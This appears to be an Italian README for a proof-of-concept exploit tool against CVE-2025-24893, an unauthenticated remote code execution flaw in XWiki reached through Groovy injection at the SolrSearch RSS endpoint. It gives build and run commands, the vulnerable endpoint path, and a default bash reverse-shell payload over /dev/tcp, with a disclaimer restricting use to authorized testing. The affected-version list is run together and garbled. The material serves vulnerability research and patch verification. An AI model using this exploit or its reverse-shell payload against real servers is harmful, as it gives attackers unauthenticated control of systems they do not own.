
Exploit Proof-of-Concept per CVE-2025-24893, una vulnerabilità di esecuzione remota di codice (RCE) non autenticata in XWiki. Sfrutta una falla di template injection nell'endpoint SolrSearch tramite esecuzione di script Groovy.
Exploit Proof-of-Concept per CVE-2025-24893, una vulnerabilità critica di Esecuzione Remota di Codice non autenticata in XWiki.
Questo exploit sfrutta un'iniezione di template Groovy nell'endpoint SolrSearch per eseguire comandi arbitrari — inclusi reverse shell — senza autenticazione.
Un difetto nel modo in cui XWiki gestisce input appositamente modificati per l'endpoint RSS SolrSearch consente agli aggressori di iniettare codice Groovy nel pipeline di rendering.
Ciò permette RCE non autenticata tramite blocchi di script {{groovy}}.
< 15.10.11>= 16.0.0 e < 16.4.115.10.1116.4.1Scarica la release:
o compila dal sorgente:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
C'è un payload reverse shell predefinito in questa forma:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
Questo codice è solo per scopi educativi e di ricerca sulla sicurezza autorizzata.
Non utilizzare questo exploit contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione al test.
/bin/get/Main/SolrSearch?media=rss